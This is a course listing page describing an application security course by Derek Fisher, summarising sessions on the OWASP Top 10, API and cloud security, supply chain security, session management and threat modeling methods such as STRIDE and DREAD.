We may earn an affiliate commission when you visit our partners.
Derek Fisher

In an era where cyber threats are ever-evolving and increasingly sophisticated, securing applications from the ground up is more essential than ever. This course is a robust, all-encompassing course designed to equip software developers, and security professionals with the knowledge and tools necessary to protect their applications throughout the entire software development lifecycle (SDLC).

Read more

In an era where cyber threats are ever-evolving and increasingly sophisticated, securing applications from the ground up is more essential than ever. This course is a robust, all-encompassing course designed to equip software developers, and security professionals with the knowledge and tools necessary to protect their applications throughout the entire software development lifecycle (SDLC).

This course begins by introducing participants to foundational security concepts such as "Defense in Depth," where we explore the anatomy of attacks, including vulnerabilities, exploits, and payloads, using real-world examples like the "PrintNightmare" vulnerability. We will examine how to implement multiple layers of security to build a comprehensive defense strategy against these threats. As participants progress, they will gain a deep understanding of essential security principles, including confidentiality, integrity, and availability (CIA), alongside key practices for managing authentication, authorization, and session management.

A significant portion of the course is dedicated to modern challenges in application security, such as API security. Participants will learn how Application Programming Interfaces (APIs) function within web applications, the risks they pose, and the strategies to secure them effectively. This includes a deep dive into industry standards and frameworks like the OWASP Top 10, which highlight the most critical security risks to web applications today. We’ll explore the nuances of implementing robust security controls, risk rating methodologies such as those from

Participants will also delve into advanced topics like software supply chain security, ensuring the integrity of software from development to deployment. The course covers the full spectrum of vulnerability management, from identification and evaluation to remediation and reporting, providing participants with the skills needed to maintain the security and integrity of IT systems continuously.

A thorough exploration of cryptographic techniques, including hashing, encryption (both symmetric and asymmetric), and the use of digital certificates and Public Key Infrastructure (PKI), will be provided to ensure that participants can protect sensitive data and secure communications effectively. We will cover JSON Web Tokens (JWTs), JSON Web Encryption (JWE), and JSON Web Signatures (JWS) to illustrate how these technologies are used to secure data transmissions in web applications.

As the course progresses, participants will explore the critical integration of security within the DevOps process, known as DevSecOps. Here, we emphasize the importance of embedding security practices early and continuously throughout the development lifecycle. We’ll examine the security of Continuous Integration and Continuous Deployment (CI/CD) pipelines, understanding how to secure these processes against unauthorized access, code tampering, and other threats. Participants will learn to implement security testing tools, including Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), Runtime Application Self-Protection (RASP), Web Application Firewalls (WAF), and more.

Moreover, the course will cover emerging areas like Application Security Posture Management (ASPM), which offers a comprehensive view of the security health of software applications by integrating various security practices and tools. This holistic approach ensures that organizations can manage vulnerabilities, configuration weaknesses, and compliance with security policies across the entire application lifecycle.

Practical demonstrations and hands-on activities will allow participants to apply what they’ve learned in real-world scenarios. From exploring attack trees and threat modeling techniques to conducting penetration tests and leveraging tools like CodeQL for secure coding, participants will gain valuable experience in identifying, mitigating, and responding to security threats.

By the end of this course, participants will have developed a deep, nuanced understanding of application security. They will be able to integrate security practices seamlessly into the SDLC, ensuring their applications are not only functional but resilient and secure against the full spectrum of cyber threats. Whether you're a seasoned security professional or a developer new to application security, this course will empower you with the knowledge and skills to build and maintain secure, reliable software in today’s digital landscape.

Enroll now

What's inside

Learning objectives

  • Learn how to become an application security champion.
  • What is the owasp top 10 and how to defend against those vulnerabilities.
  • Use of threat modeling to identify threats and mitigation in development features.
  • How to perform a threat model on an application.
  • How to perform a vulnerability scan of an application.
  • Rating security vulnerabilities using standard and open processes.
  • How to correct common security vulnerabilities in code.
  • How application security fits in an overall cyber security program
  • Building security in to the software development life cycle.

Syllabus

What should you expect from this class. What we will and won't cover.
Welcome to Understanding Application Security!
Introduction to Derek and the course. You will learn some of the terms we use throughout this course as well as see a hands-on demo of WebGoat.
Read more

Here we explore the software development lifecycle (SDLC) and its integration with security practices. The session begins with an introduction to the SDLC phases, starting from the initial gathering of customer requirements, through design, development, testing, and finally, deployment into production. We emphasize the importance of translating customer needs into actionable design elements, chunking work into manageable tasks, and thoroughly testing each component.

We also highlight the critical role of security within the SDLC, from embedding security requirements during the design phase to implementing application security testing tools in the development and testing phases. Key security concepts such as threat modeling, secure architecture reviews, and vulnerability management are discussed, ensuring that security is integrated throughout the entire lifecycle.

In this section, we delve into the OWASP (Open Web Application Security Project) and its significance in software security. OWASP has evolved into a comprehensive resource for application security, offering tools, standards, and frameworks to support secure software development. We begin by exploring OWASP's key offerings, including Threat Dragon for threat modeling, ASVS for security requirements, and various tools like Dependency-Check and CycloneDX for managing vulnerabilities in third-party components.

In this session, we dive into foundational security concepts, beginning with defining security and cybersecurity. Drawing from various definitions, we explore the essence of security as the protection of assets against threats, whether intentional, like cyber attacks, or unintentional, like failures. We then break down key terms such as assets, vulnerabilities, attacks, and threats, emphasizing how these elements interact within a system.

The session also introduces the core goals of cybersecurity, often referred to as the CIA triad: Confidentiality, Integrity, and Availability. We discuss how these principles guide the protection of IT assets within an organization, ensuring data is kept secure, accurate, and accessible only to authorized users.

In this session, we explore the core goals of cybersecurity within IT and technology organizations, focusing on the three fundamental pillars: confidentiality, integrity, and availability. We begin by defining each of these goals:

  • Confidentiality: Ensuring that sensitive information is accessible only to authorized individuals.

  • Integrity: Maintaining the accuracy and unaltered state of data, safeguarding it from unauthorized modifications or corruptions.

  • Availability: Ensuring that data and services are accessible to authorized users whenever needed.

These pillars collectively form the CIA triad, which is central to all security strategies.

We then move on to discuss security mechanisms and principles that support these goals. Key principles include economies of mechanism (keeping it simple), fail-safe defaults, complete mediation, open design, separation of privileges, least privilege, least common mechanism, and psychological acceptability. These principles guide the selection and design of security mechanisms to effectively implement the CIA triad.

In this session, we delve into the National Institute of Standards and Technology (NIST) and its pivotal role in advancing cybersecurity practices. NIST, though broader in its focus, provides significant resources and frameworks for enhancing cybersecurity across various sectors.

We begin with an overview of NIST’s cybersecurity programs, which aim to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and related technologies. These programs are crucial in addressing current and future cybersecurity challenges.

In this session, we explore the Cloud Security Alliance (CSA) and its vital role in promoting best practices for security within cloud computing. The CSA is a leading organization dedicated to providing security assurance in cloud environments by harnessing the expertise of industry practitioners, associations, governments, and corporate members.

We begin by discussing the CSA's mission to educate and secure all forms of computing through cloud-specific research and best practices. Key initiatives by CSA include the Security Trust and Assurance Registry (STAR), a comprehensive provider certification program, and the CSA Global Consulting Program, which connects cloud users with trusted security professionals.

The session then delves into the CSA Security Guidance for Critical Areas of Focus in Cloud Computing. This guidance, structured around 14 domains, offers a practical roadmap for organizations to adopt cloud securely. The domains cover essential aspects of cloud security, such as governance, infrastructure security, application security, data security, and identity management. We also discuss the Cloud Controls Matrix (CCM), a meta-framework of cloud-specific security controls that align with leading industry standards.

This quiz will cover some of the terms and goals for application security.

This module delves into the concept of defense in depth, a layered security approach designed to protect systems against vulnerabilities, exploits, and malicious payloads.

In this session, we explore the concept of "Defense in Depth" within the context of cybersecurity. The presenter walks through the anatomy of an attack, breaking down key elements such as vulnerabilities, exploits, and payloads. Using the real-world example of the "PrintNightmare" vulnerability, the session illustrates how attackers exploit weaknesses in software to deliver malicious payloads. The core of the discussion revolves around implementing multiple layers of security, known as defense in depth, to protect systems against such threats. The presenter uses a whiteboard to visually explain how various security measures, like firewalls, encryption, and intrusion detection systems, work together to safeguard a web application from multiple attack vectors. This session provides a practical and comprehensive overview of how organizations can build robust defenses to protect valuable data and systems.

In this session, we delve into key cybersecurity concepts and explore various types of threat actors. The presenter begins by defining essential terms like confidentiality, integrity, availability (CIA), authentication, authorization, and more. These foundational concepts set the stage for understanding how systems manage security and access control.

The session then shifts to an in-depth analysis of different threat actors, ranging from script kiddies and hacktivists to advanced persistent threats (APTs). The presenter discusses each group's skill level, motivation, and common attack methods, highlighting the varying levels of difficulty in defending against them. The discussion also covers important tools like the Common Vulnerabilities and Exposures (CVE) system, the Common Vulnerability Scoring System (CVSS), the Exploit Prediction Scoring System (EPSS), and the Common Weakness Enumeration (CWE). These tools help organizations identify, assess, and prioritize vulnerabilities, guiding their security efforts.

In this session, we explore the critical topic of API security, delving into what APIs are and how they function within modern web applications. The session begins by defining APIs (Application Programming Interfaces) and their role in enabling modular functionality within applications. The presenter contrasts the traditional HTTP request-response model with the more specific and often lightweight calls made through APIs, which frequently return data in formats like JSON or XML.

The discussion then shifts to API security, emphasizing the importance of safeguarding APIs against various vulnerabilities. The presenter introduces the OWASP API Security Top 10, a set of guidelines designed to address common security issues in APIs. Each of the top 10 vulnerabilities, such as Broken Object Level Authorization, Broken Authentication, and Security Misconfiguration, is explained in detail, along with prevention strategies to mitigate these risks.

In this session, we explore Content Security Policy (CSP), a crucial security feature designed to protect web applications from common attacks like cross-site scripting (XSS) and data injection. The session begins by explaining what CSP is and how it functions as an additional layer of defense for web applications. By controlling the sources from which content can be loaded on a web page, CSP ensures that only trusted content is executed by the browser, thereby mitigating risks such as XSS, clickjacking, and packet sniffing.

The session also delves into how to implement CSP, detailing the use of policy directives that define rules for different resource types like scripts, styles, images, and connections. The presenter provides examples of how to write a CSP policy using HTTP headers or meta tags, including a sample policy that restricts content to trusted sources.

In this session, we explore Server-Side Request Forgery (SSRF), a significant web security vulnerability that can lead to unauthorized access to internal systems and data leakage. SSRF allows attackers to manipulate a server-side application into making HTTP requests to arbitrary domains chosen by the attacker. The session begins with an explanation of how SSRF works, emphasizing the potential security risks it poses.

To help viewers understand how to defend against SSRF attacks, the session covers strategies at both the network and application layers. At the network layer, defenses include segmenting remote resource access functionality and enforcing a "deny by default" firewall policy to block unnecessary internet traffic. At the application layer, the focus is on sanitizing and validating client-supplied input using an allow list approach, disabling HTTP redirections, and avoiding user-supplied URLs as input.

In this session, we explore the critical components and processes involved in Vulnerability Management and how they contribute to maintaining the security and integrity of IT systems. Effective vulnerability management is an ongoing process that involves identifying, evaluating, and addressing security vulnerabilities in an organization's infrastructure.

Common Vulnerability Scoring System (CVSS)

We begin by discussing the Common Vulnerability Scoring System (CVSS), an open framework used to communicate the characteristics and severity of software vulnerabilities. CVSS is a cornerstone of vulnerability management, providing a standardized method for assessing and comparing the impact of vulnerabilities across different systems and applications.

CVSS includes four metric groups:

  1. Base Metrics: Reflect the intrinsic qualities of a vulnerability that remain constant over time.

  2. Threat Metrics: Describe the characteristics of the vulnerability that can change over time.

  3. Environmental Metrics: Focus on unique aspects of the vulnerability specific to the user’s environment.

  4. Supplemental Metrics: Provide additional insights into the characteristics of the vulnerability.

The Base Score is particularly important, as it rates the severity of a vulnerability on a scale from 0 to 10, helping organizations prioritize their responses to vulnerabilities. The score considers factors like the attack vector, complexity, required privileges, user interaction, and the impact on confidentiality, integrity, and availability.

Section Quiz
More in-depth review of the Top 10 Web Application vulnerabilities.

In this session, we delve into the critical topic of broken access control, a common vulnerability that occurs when security policies meant to restrict user actions fail. Access control is designed to ensure that users cannot act outside their intended permissions, but when it breaks down, it can lead to unauthorized access, modification, or destruction of data, and misuse of business functions. This session highlights the various ways in which access control can be compromised, such as through URL manipulation, inadequate authorization checks, or improper handling of access tokens.

We explore common vulnerabilities, including violations of the principle of least privilege, bypassing access control checks, and unauthorized API access. Additionally, we discuss techniques to prevent these issues, such as enforcing "deny by default" policies, implementing robust access control mechanisms, and ensuring proper authorization checks are consistently applied throughout an application.

Broken Access Control - Demo

In this session, we delve into the critical topic of cryptographic failures, exploring how improper handling of cryptographic processes can expose sensitive data to unauthorized access. We begin by identifying key types of sensitive data that organizations must protect, such as Personally Identifiable Information (PII), Protected Health Information (PHI), and financial data, including PCI (Payment Card Industry) data.

We discuss essential strategies for safeguarding data at rest, in motion, and in use. This includes data encryption, access controls, secure data deletion, transport layer encryption, digital certificates, memory management, and more. We also emphasize the importance of discovering, classifying, tagging, and mapping data within a system to ensure comprehensive protection.

A key focus is on encryption techniques, including the use of HTTPS for web applications and various encryption methods for databases. We also introduce Hardware Security Modules (HSMs) as a secure means of storing cryptographic keys.

In this session, we explore the concept of injection attacks, focusing primarily on SQL injection, one of the most prevalent and dangerous web security vulnerabilities. The session begins with a detailed explanation of what injection is, describing how user input can be manipulated to change the intended behavior of a system, leading to unauthorized actions such as data retrieval, modification, or deletion.

The session walks through various types of injection attacks, including SQL injection, NoSQL injection, OS injection, and LDAP injection, providing specific examples and prevention techniques for each. Emphasis is placed on the importance of input validation, sanitization, and the use of parameterized queries to prevent these types of attacks.

Injection Demo

In this session, we explore the concept of insecure design, a critical category introduced by OWASP in 2021, which emphasizes the importance of addressing security during the design phase of software development. We define insecure design as the lack of proper security controls or considerations in the application's architecture, potentially leading to exploitable vulnerabilities.

We discuss how to avoid insecure design by integrating threat modeling early in the design phase, applying secure design principles and patterns, and conducting regular security reviews. Additionally, we highlight the importance of creating secure user stories, implementing threat modeling to identify risks, and incorporating various application security testing methods throughout the Software Development Life Cycle (SDLC).

The session also covers common attacks related to insecure design, including missing access controls, broken authentication, security misconfiguration, and inadequate data protection. We provide real-world examples, such as the 2023 Dark Beam breach, to illustrate the consequences of insecure design and misconfiguration.

In this session, we explore the concept of security misconfiguration, a common and often overlooked vulnerability that can expose systems and applications to severe risks. Security misconfiguration occurs when security settings are improperly defined, implemented, or maintained, leaving various layers of a system—such as operating systems, web servers, database servers, and application code—vulnerable to attacks.

We discuss the potential consequences of security misconfiguration, including data breaches, loss of sensitive information, and significant reputational damage. The session highlights how attackers can exploit misconfigurations by targeting unsecured servers, default accounts with unchanged passwords, exposed error messages, and outdated software.

In this session, we dive into the risks and challenges associated with using known vulnerable components within software development. We explore the concept of dependencies—both direct and indirect—that your application may rely on, and how vulnerabilities in these components can introduce significant security risks.

We discuss the importance of thoroughly vetting third-party libraries, implementing strong dependency management processes, and regularly monitoring for vulnerabilities. This session also emphasizes the need for robust security practices, such as signing software, utilizing reputable repositories, and staying informed through security bulletins.

In this session, we explore the critical topic of identification and authentication failures, emphasizing the importance of securing the process of verifying user identities. Authentication, often shortened to "authN," is the foundation of secure access to IT systems, ensuring that only authorized users can perform actions and access sensitive information. We delve into various vulnerabilities that can weaken authentication mechanisms, including the lack of HTTPS, absence of multi-factor authentication (MFA), weak password recovery processes, and the dangers of automated attacks such as brute forcing and credential stuffing.

We also discuss common attacks that target authentication systems, such as exploiting default credentials, ineffective password storage, and session management flaws. The session provides practical defenses against these threats, including enforcing strong password practices, implementing MFA, limiting failed login attempts, and securing session management.

Identification Failures Demo

In this session, we explore software and data integrity failures, focusing on the critical stages from code development to production deployment. We begin by mapping out the typical software delivery pipeline—code is written by developers, checked into a source code manager, built, tested, and finally deployed in production. Along this journey, various points are vulnerable to integrity failures that could compromise the security and reliability of the software.

Key issues include the use of unsigned or malicious software packages, the risks of pulling code from untrusted repositories, and the dangers of installing patches that might carry vulnerabilities. We also address the importance of verifying the integrity of data that flows between applications and systems, emphasizing the need for robust integrity checks.

In this session, we delve into the critical topic of security logging and monitoring failures, a key factor in many significant cybersecurity incidents. We discuss how inadequate logging and monitoring can allow attackers to operate undetected, increasing the likelihood of successful breaches and the complexity and cost of remediation. Historical data highlights the importance of reducing the time between a breach and its detection, with recent statistics showing a reduction in detection time from 191 days in 2016 to 21 days in 2021.

We explore real-world scenarios where logging and monitoring failures can occur, such as during penetration testing, high-value transactions, or repeated failed authentication attempts, and how these should trigger alerts. The session emphasizes the importance of utilizing a Security Information and Event Management (SIEM) system to aggregate logs from various systems and ensure that all significant events are captured and analyzed.

Session Description:

In this session, we delve into the concept of cross-site scripting (XSS), a prevalent web security vulnerability that allows attackers to inject malicious scripts into web applications. These scripts are then executed in the browsers of unsuspecting users. We start by explaining what XSS is, breaking it down into two primary types: reflected and stored (or persistent) XSS. Reflected XSS involves the immediate reflection of malicious scripts off a web server, while stored XSS is more severe, with the script being stored permanently on the server.

The session explores the various impacts of XSS, including stealing sensitive data like cookies and session tokens, defacing websites, and redirecting users to malicious sites. We also cover how XSS can bypass security measures like the same-origin policy, which typically restricts scripts from accessing data on other pages.

XXS Demo

This quiz will test your knowledge on the OWASP Top Ten.

Analyze the key components of a software supply chain, identify potential vulnerabilities, and apply best practices to enhance the security of their project's software dependencies.

In this session, we dive into the critical topic of software supply chain security, exploring the practices and measures necessary to ensure the integrity and security of software throughout its entire lifecycle. We start by defining the software supply chain, which includes various stages such as design, development, testing, integration, packaging, and delivery to end users. Each of these stages presents potential security risks, and attackers may attempt to exploit vulnerabilities at any point to compromise the software.

In this session, we focus on mitigating supply chain security issues by exploring various strategies and controls designed to ensure the integrity and security of software throughout its lifecycle. We begin by discussing the concept of software integrity, which SafeCode defines as the confidence that software, hardware, and services are free from both intentional and unintentional vulnerabilities and that they function as intended. We highlight key principles essential to maintaining software integrity, such as chain of custody, least privileged access, separation of duties, tamper resistance and evidence, persistent protection, compliance management, and thorough code testing and verification.

In this session, we delve into Software Composition Analysis (SCA), a critical process for validating that the components, libraries, and open-source software used in an application are free from known vulnerabilities and comply with license requirements. As modern software development often involves integrating a significant amount of third-party code, SCA plays a vital role in identifying and managing risks associated with these external components.

We begin by explaining the purpose of SCA, which is to identify open-source vulnerabilities or license issues within software integrated into an application. The vast majority of code in a final product often comes from external sources, such as open-source libraries, commercial applications, or third-party services. As developers incorporate these external components into their projects, it's crucial to ensure that they are secure and up-to-date.

In this session, we explore the Supply Chain Levels for Software Artifacts (SLSA or "Salsa"), a framework designed to enhance the security and trustworthiness of software supply chains. SLSA provides a set of best practices and guidelines to evaluate, improve, and verify the integrity of software artifacts throughout the supply chain, with the goal of increasing transparency, reducing risk, and protecting against potential tampering or compromise of software components.

We start by discussing the importance of ensuring the integrity of source code, the build process, and the packaging process. Key points include the necessity of authorizing and authenticating individuals who contribute to the source code, preventing unintentional changes, and ensuring that the source code repository used for builds is legitimate and secure. Additionally, the session emphasizes the need for robust security controls within the build pipeline and the importance of verifying that third-party dependencies are not vulnerable.

In this session, we delve into the concept of Software Bill of Materials (SBOMs), a crucial tool for enhancing transparency and security within the software supply chain. SBOMs provide a formal, machine-readable inventory of software components and dependencies, along with their hierarchical relationships. These inventories play a vital role in ensuring that all software components used in a project are accounted for and evaluated for security and compliance risks.

We begin by exploring the different types of SBOMs as defined by the Cybersecurity and Infrastructure Security Agency (CISA):


  1. Design SBOMs: Intended for planned software projects, capturing the intended components and architecture.

  2. Source SBOMs: Created directly from the development environment, capturing source files and dependencies used to build the software artifact.

  3. Build SBOMs: Generated as part of the build process, including data from source files, dependencies, build components, and ephemeral data.

  4. Analyzed SBOMs: Created through the analysis of artifacts post-build, providing insights into the software as it exists in its final form.

  5. Deployed SBOMs: Document the software as it is deployed on a system, capturing an inventory that includes software from various SBOMs and dynamically loaded components.

  6. Runtime SBOMs: Generated by instrumenting the system running the software, focusing on components present during execution and external interactions.

In this lecture, we delve into the intersection of Cyclone DX and Dependency-Track, two essential tools for managing software dependencies and enhancing security in the development process.

Check your knowledge of supply chain security

Understand what containers are and their use in architecture as well as cloud architecture and security concerns related to cloud environments.

In this section, we provide an overview of cloud computing, focusing on its key characteristics like scalability and cost efficiency. We delve into the shared responsibility model, highlighting the security responsibilities of both cloud service providers and customers. Additionally, we discuss the benefits of cloud technology, including enhanced security and flexibility. This content is part of our Cloud, AWS, and Container Security series.

In this section on cloud security, we explore the unique security challenges associated with cloud computing. We discuss common security risks, such as data breaches and misconfigurations, and how these can be exacerbated in a cloud environment. The shared responsibility model is highlighted as a key concept, emphasizing the division of security responsibilities between cloud service providers and customers. We also touch on compliance and regulatory issues, the impact of multi-tenancy, and the potential for virtualization vulnerabilities. Data residency and sovereignty concerns are addressed, as well as the importance of cloud service provider reliability.

This section introduces the AWS security pillar within the well-architected framework, emphasizing the shared responsibility model between AWS and its customers. Key design principles for cloud security are highlighted, including strong identity foundations, traceability, defense in depth, automation of security practices, data protection, minimizing human access to data, and preparation for security events.

In this section, the focus is on Amazon Web Services Identity and Access Management (IAM), a fundamental aspect of managing access to AWS resources. The key IAM concepts explored here include AWS accounts, users, groups, roles, and policies.

In this section, the focus is on detection within AWS, encompassing various stages of the application delivery lifecycle, including development, deployment, and operations. The CI/CD (Continuous Integration/Continuous Deployment) pipeline is highlighted as the process through which software is continuously integrated, packaged, and deployed to various environments.

In this section, the focus is on infrastructure protection within AWS. This entails safeguarding the various components of an AWS environment, including network boundaries, system configurations, and compute resources.

In this section, the focus is on data protection within AWS, encompassing the safeguarding of data at rest and in transit. The fundamental principles of data protection in AWS revolve around data classification and encryption.


In this section, the focus is on incident response within AWS. While application security professionals may not typically be directly involved in incident response, it's essential to be aware of the AWS services and mechanisms that play a crucial role in responding to security incidents effectively.

Application security is a critical aspect of AWS, and by following these practices and utilizing AWS-specific tools and services, organizations can enhance the security of their applications within the AWS environment.

Container security is crucial in modern application deployment scenarios, here are some tools and practices to help organizations secure their containerized workloads effectively.

While AWS has the market share of cloud deployments, both GCP and Azure have their own unique approach to cloud and cloud security.

This quiz will test your knowledge of cloud and container security.

In this section we will discuss various session management techniques to help with authentication and authorization.

In this section, we explored the concept of session management in web applications, emphasizing the importance of maintaining session integrity and security. Session management allows web applications to track user interactions through unique session IDs or tokens, often managed via cookies. These session IDs link user authentication credentials to HTTP traffic, enabling consistent access control. Best practices include marking session cookies as secure and HTTP-only, avoiding the use of Max-Age and Expires values to prevent persistent cookies, and implementing security measures like generating random, unguessable session IDs and automatically expiring sessions after inactivity. Additionally, we touched on federated identity, which allows single sign-on across multiple IT systems, enhancing both security and user experience.

In this section, we discussed web server session management, focusing on how different platforms like Java and .NET handle sessions. Java provides session management through the HTTP session interface, allowing sessions to be created or retrieved via methods like getSession. For .NET, session state can be stored in various modes, such as InProc, StateServer, SQLServer, or Custom. Each mode offers different levels of persistence and scalability, depending on the application’s needs. For instance, InProc stores session data in memory on the web server, while SQLServer mode stores it in a database, offering better persistence across application restarts and compatibility with web farms. However, storing session data, especially in URLs, can raise security concerns, emphasizing the need for secure session management practices.

In this section, we discussed JSON Web Tokens (JWTs), a compact and self-contained method for securely transmitting information between parties as a JSON object. JWTs can be signed using either a secret with HMAC algorithms or a public/private key pair with RSA or ECDSA, ensuring the integrity and authenticity of the transmitted data. Common use cases for JWTs include authorization, where a JWT allows access to specific resources, and authentication, where a JWT is used instead of traditional server-side sessions. The structure of a JWT consists of three parts: a header (which includes the token type and hashing algorithm), a payload (which contains claims or statements about the user), and a signature (which ensures the token hasn’t been tampered with). This design allows JWTs to be stateless, meaning that the server does not need to store user sessions, thereby improving efficiency and security.

Example of a JSON Web Token in action.

JWE (JSON Web Encryption)

In this section, we discussed OAuth, an open standard for access delegation that allows users to grant third-party websites or applications access to their information on other platforms without sharing their passwords. OAuth is widely used by companies like Amazon, Google, and Facebook to enable secure data sharing. It separates authentication from authorization, supporting various use cases, including server-to-server, browser-based, mobile, and console applications. OAuth enables apps to obtain limited access, known as scopes, to a user’s data through access tokens issued by an authorization server, with the user’s consent. The process typically involves a user granting permissions, often customizable, which are then used by the third-party application to access protected resources. This framework is essential for securely managing API access and protecting user data across different platforms.

In this section, we discussed OpenID, an open standard and decentralized authentication protocol that allows users to authenticate with multiple websites using a single identity, managed by a third-party identity provider. Promoted by the nonprofit OpenID Foundation, this protocol eliminates the need for users to create separate logins and passwords for each site, enhancing convenience and security. The OpenID protocol facilitates communication between the identity provider and the relying party (the website), allowing users to sign in without exposing their password to any site other than the identity provider.

OpenID Connect, a layer built on top of OAuth 2.0, extends this functionality by enabling clients, such as web-based or mobile applications, to verify a user's identity and obtain basic profile information securely. This integration supports a broad range of client types and includes optional features like encryption and session management, making it a versatile tool for modern web authentication and identity verification.

This quiz will test your knowledge of session management practices

In this section we will learn about risk rating and threat modeling and their roles in the secure SDLC.

In this session, we explore the crucial concept of risk rating, an essential process for identifying, assessing, and prioritizing risks within an IT environment. We discuss various risk rating methodologies, including NIST 830, FAIR (Factor Analysis of Information Risk), OWASP, and CIS RAM (Center for Internet Security Risk Assessment Method), providing insights into how these frameworks help organizations evaluate the likelihood and impact of potential threats.

The session covers the importance of risk rating during different phases of development, such as application architecture reviews, threat modeling, code reviews, and penetration testing. By understanding and applying risk rating, organizations can better prioritize threats based on their severity, likelihood of occurrence, and contextual factors unique to their industry or business.

We also delve into specific risk scoring techniques, including FAIR's quantitative approach to measuring risk, OWASP's method for assessing web application vulnerabilities, and CIS RAM's focus on cybersecurity impacts and safeguards. Real-world examples and scenarios are used to illustrate how these frameworks can be applied to develop effective mitigation strategies.

Additionally, we discuss the process of deciding which risks to address and how to develop comprehensive mitigation plans. This includes leveraging existing frameworks and best practices, such as the OWASP Top Ten, NIST's Secure Software Development Framework (SSDF), and Microsoft's SDL, to create robust security measures that minimize risk.

Performing a Risk Rating

In this session, we explore the development and implementation of security controls, which are essential measures to counteract various security threats. We categorize these controls into six main types: Preventative, Detective, Deterrent, Corrective, Recovery, Compensating, and Access Controls, each serving a specific function in safeguarding systems and data.

Threat modeling is a structured approach used to identify, quantify, and address security threats within an application or system. Ideally performed during the early stages of architecture development, it helps define security requirements and mitigate potential vulnerabilities before they become costly to fix. The process involves understanding key elements such as attackers, assets, threats, and risks, and emphasizes the importance of fact-based analysis over assumptions. By integrating threat modeling into the software development life cycle (SDLC), organizations can reduce the attack surface, prioritize mitigation efforts, and improve overall security posture. The approach follows a defense-in-depth model, securing data, applications, hosts, and networks to ensure comprehensive protection while balancing security needs with system functionality.

Threat modeling can be performed using either manual efforts or automated tools, each with its own advantages and limitations. Manual threat modeling offers high quality and customization, requiring only a whiteboard and a team of experts, but it lacks scalability. On the other hand, using tools can scale the process, though it might lead to a "check-the-box" mentality due to varying preferences in tools like Wiki, PowerPoint, or specialized threat modeling software. Various threat modeling methodologies are supported by these tools, such as STRIDE, developed by Microsoft, which categorizes threats into spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privileges. Each category addresses a different aspect of security, ensuring that systems are analyzed comprehensively for potential vulnerabilities. Other methodologies like OCTAVE and PASTA focus on non-technical risks and attacker perspectives, respectively, offering diverse approaches to identifying and mitigating threats within a system.

Manual threat modeling involves asking critical questions about the system or application to identify potential security risks and vulnerabilities. The process typically begins by assembling a diverse team that includes developers, architects, operations personnel, and security experts. The goal is to create an architecture diagram that visually represents the system, including components like data flows, trust boundaries, and servers. By analyzing each component, the team can identify potential threats and their impacts, such as spoofing, tampering, or information disclosure. The process involves brainstorming what could go wrong, determining the impact if those threats are realized, and proposing mitigation strategies. For instance, in a healthcare application, threat modeling might reveal that cybercriminals could target patient data through phishing attacks. The impact could range from a single compromised record to the entire database being stolen. A potential countermeasure could be implementing multi-factor authentication, especially for critical accounts with elevated access. The exercise helps the team understand what’s at risk and how to protect against those risks, ensuring the system's security is thoroughly analyzed and addressed.

When using the Microsoft Threat Modeling Tool, the first step is to decompose the application by defining the scope and understanding the architecture. This involves creating a detailed diagram that includes components, data stores, data flows, and trust boundaries. The goal is to focus on a small part of the system to complete the threat modeling process effectively. Once the system is outlined, threats are identified and categorized using the STRIDE model, which includes spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privileges. The tool then helps in analyzing these threats, proposing mitigation strategies, and validating their effectiveness. Finally, you can generate a comprehensive report that includes the diagrams and threat details. The tool is user-friendly, making it accessible even to non-security experts, and helps streamline the threat modeling process for developers.

Demo of Microsoft Threat Model Tool

Demo of OWASP Threat Dragon

This quiz will test your knowledge of threats and risks.

More Advanced Threat Modeling

In threat modeling, several key terms and concepts are essential to understand. An adversary is any individual or group that poses a threat to an organization’s assets. The attack surface represents all possible points where an attacker could target a system, while an attack vector is the specific path or method used to exploit vulnerabilities. An exploit refers to the technique or code that takes advantage of these vulnerabilities. Mitigation involves implementing measures to reduce associated risks. Trust boundaries mark the separation between trusted and untrusted system components, and the principle of least privilege ensures users only have the access necessary to perform their tasks. Security controls are safeguards to protect assets, and security by design integrates security considerations throughout the development life cycle.

DREAD is a threat modeling technique developed by Microsoft, used to assess and prioritize security risks by evaluating the potential impact and risk associated with identified threats and vulnerabilities. DREAD stands for Damage, Reproducibility, Exploitability, Affected Users, and Discoverability. Each factor is scored on a scale of 0 to 10, with 0 representing minimal concern and 10 representing extreme concern. The scores are then summed to determine the overall risk level, helping organizations focus resources on the most critical threats.

For example, in a secure file storage service, the DREAD model might assign a damage score of 7 due to the significant potential loss of sensitive data, a reproducibility score of 5, an exploitability score of 6, an affected users score of 8, and a discoverability score of 7. This would result in a total DREAD score of 33 out of 50, indicating a moderate to high risk that should be prioritized for mitigation. By using DREAD, organizations can systematically assess and address the most significant security threats in a structured and quantifiable manner.

The MITRE ATT&CK framework, which stands for Adversarial Tactics, Techniques, and Common Knowledge, is a comprehensive resource for understanding the tactics, techniques, and procedures (TTPs) that cyber adversaries use during various stages of an attack. It categorizes the different stages of an attack, from initial access to the impact on the target system, and offers insights into how attackers operate, which helps in threat modeling and cybersecurity defense strategies. The framework is especially valuable for identifying attack vectors and understanding how different methods of attack can compromise a system, enabling organizations to develop robust defense strategies.

For example, when assessing a banking application using the MITRE ATT&CK framework, security analysts might identify potential threats such as phishing attacks targeting login credentials, session token theft during account reviews, or forged requests for unauthorized fund transfers. To mitigate these threats, the framework suggests a variety of countermeasures including security awareness training, multi-factor authentication (MFA), strong user management practices, and continuous monitoring of account activities. By mapping out these potential attack vectors and implementing appropriate defenses, organizations can better protect their systems and users from cyber threats.

Attack trees are a powerful tool for visualizing and analyzing potential attack scenarios in threat modeling. They start with a specific goal, such as compromising a system, and then branch out to illustrate various ways an attacker could achieve that objective. By breaking down the steps required for an attack, security professionals can better understand and address vulnerabilities in their systems. Additionally, attack libraries like the Common Attack Pattern Enumeration and Classification (CAPEC) and the MITRE ATT&CK framework offer comprehensive databases of known attack patterns and techniques, enabling more accurate identification and mitigation of threats.

Other threat modeling techniques include methodologies like Trike, which integrates elements from multiple threat modeling approaches, including STRIDE, DREAD, and attack trees, to create a unified framework for security auditing from a risk management perspective. OCTAVE focuses on the business impact of threats and is often used for enterprise-level assessments, while PASTA is a seven-step, risk-centric framework that emphasizes understanding the business context of applications and systems. These methodologies provide structured approaches to identifying, analyzing, and mitigating security risks, making them essential tools for organizations aiming to protect their assets from potential threats.

